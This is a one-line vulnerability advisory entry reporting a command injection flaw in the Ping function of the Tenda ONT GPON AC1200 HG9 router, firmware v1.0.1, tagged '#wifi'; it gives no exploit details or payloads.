Tenda ONT GPON AC1200 Dual band WiFi HG9 v1.0.1 is vulnerable to Command Injection via the Ping function.

Tag

#wifi